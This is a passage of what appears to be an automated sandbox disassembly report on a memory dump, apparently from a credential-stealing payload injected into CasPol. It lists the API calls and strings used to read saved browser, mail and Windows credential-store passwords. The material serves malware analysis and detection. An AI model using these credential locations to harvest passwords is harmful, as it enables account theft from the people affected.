                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 710961058-601624466
                                                                                                                                                                                    • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                                                                                                    • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$memset$_mbscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 3402215030-3842416460
                                                                                                                                                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                                                                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                                                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000), ref: 00407B6E
                                                                                                                                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                                                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                                                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F139
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F147
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F187
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F196
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F207
                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                                                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                                                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                                                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                                                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                                                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00444612
                                                                                                                                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                    • strlen.MSVCRT ref: 0044462E
                                                                                                                                                                                    • memset.MSVCRT ref: 00444668
                                                                                                                                                                                    • memset.MSVCRT ref: 0044467C
                                                                                                                                                                                    • memset.MSVCRT ref: 00444690
                                                                                                                                                                                    • memset.MSVCRT ref: 004446B6
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                                                                                                                                    • String ID: salu
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA,7570CFBC), ref: 00410060
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                      • Part of subcall function 00404734: LoadLibraryA.KERNEL32(?), ref: 0040473C
                                                                                                                                                                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?,?,00000000), ref: 00404754
                                                                                                                                                                                    • strlen.MSVCRT ref: 00443AD2
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                                                                                                                                                                    • memset.MSVCRT ref: 00443B2E
                                                                                                                                                                                    • memset.MSVCRT ref: 00443B4B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Software\Microsoft\Windows Live Mail), ref: 00443B79
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00443C23
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00443C2C
                                                                                                                                                                                      • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                                                                                                                                                                    • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                                                                                                                                                                    • Salt, xrefs: 00443BA7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                                    • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                                    • API String ID: 665470638-2687544566
                                                                                                                                                                                    • Opcode ID: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                    • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fbf4a21aa37e580448f311c320075cae7563dc2be1a8724c18f17f23b444984
                                                                                                                                                                                    • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    • memset.MSVCRT ref: 00403ECE
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EE2
                                                                                                                                                                                    • memset.MSVCRT ref: 00403EF6
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F17
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,<table dir="rtl"><tr><td>), ref: 00403F33
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F6A
                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F9B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F45
                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F95
                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403EA6
                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F2D
                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F11
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                    • API String ID: 113626815-1670831295
                                                                                                                                                                                    • Opcode ID: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                    • Instruction ID: 68eec6ff6ffa0e14b7f0c60be0e91221167be1d604113ab21f184662466f1ff3
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2b6206fe8b071cbe8ffc17d3dc2d1aea0963a4bf855ac14d00f231d57d43f0b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0931A5B3D00258BEEB50DB54CC82FDE77ACEF54305F1001ABF548A3141DA78AB888B69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                                                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                                                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                                                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                                                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                                                                                                    • memset.MSVCRT ref: 0040961C
                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                    • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                    • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,7570CFBC), ref: 0040FFD8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040FFE9
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040FFFA
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041000B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041001C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                    • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                    • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA,00000000,?,00000000), ref: 00404601
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree,?,00000000), ref: 0040460D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA,?,00000000), ref: 00404619
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA,?,00000000), ref: 00404625
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW,?,00000000), ref: 00404631
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                    • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                    • String ID: Creds$ps:password
                                                                                                                                                                                    • API String ID: 551151806-1872227768
                                                                                                                                                                                    • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                    • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040426A
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                                                                                                    • strchr.MSVCRT ref: 004042F6
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040430A
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040432B
                                                                                                                                                                                    • strchr.MSVCRT ref: 0040433C
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                    • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                    • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                                                                                                      • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                                                                                                      • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                                                                                                      • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                                                                                                    • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                                                                                                    • memset.MSVCRT ref: 004097BD
                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                                                                                                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                    • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                    • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                                                                                                    • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                                                                                                    • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,Common Programs,00410E5B,?,?,?,?,?,00000104), ref: 00410DB0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                    • API String ID: 714388716-318151290
